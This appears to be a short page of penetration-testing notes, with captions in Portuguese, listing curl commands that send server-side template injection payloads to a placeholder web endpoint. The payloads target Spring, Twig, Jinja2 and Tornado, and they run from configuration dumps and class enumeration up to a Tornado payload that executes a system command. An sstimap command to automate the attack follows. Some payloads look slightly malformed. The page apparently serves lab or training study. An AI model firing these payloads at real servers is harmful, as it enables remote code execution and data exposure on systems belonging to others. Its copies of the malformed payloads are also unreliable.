SSTI Exploitation Example 2

curl -X POST -d 'email=${7*7}' http://<TARGET IP>:<PORT>/jointheteam

Interagindo com o destino remoto (carga útil do Spring)

curl -X POST -d 'email={{_self.env.display("TEST"}}' http://<TARGET IP>:<PORT>/jointheteam

Interagindo com o alvo remoto (carga útil Twig)

curl -X POST -d 'email={{config.items()}}' http://<TARGET IP>:<PORT>/jointheteam

Interagindo com o alvo remoto (injeção básica Jinja2)

curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://<TARGET IP>:<PORT>/jointheteam

Interagindo com o alvo remoto (Jinja2 despeja toda a carga útil das classes)

curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

Interagindo com o alvo remoto (carga útil do Tornado)

./sstimap.py -u 'http://<TARGET IP>:<PORT>/jointheteam' -d email=blah

Automatizando o processo de exploração com sstimap

Last updated 11 months ago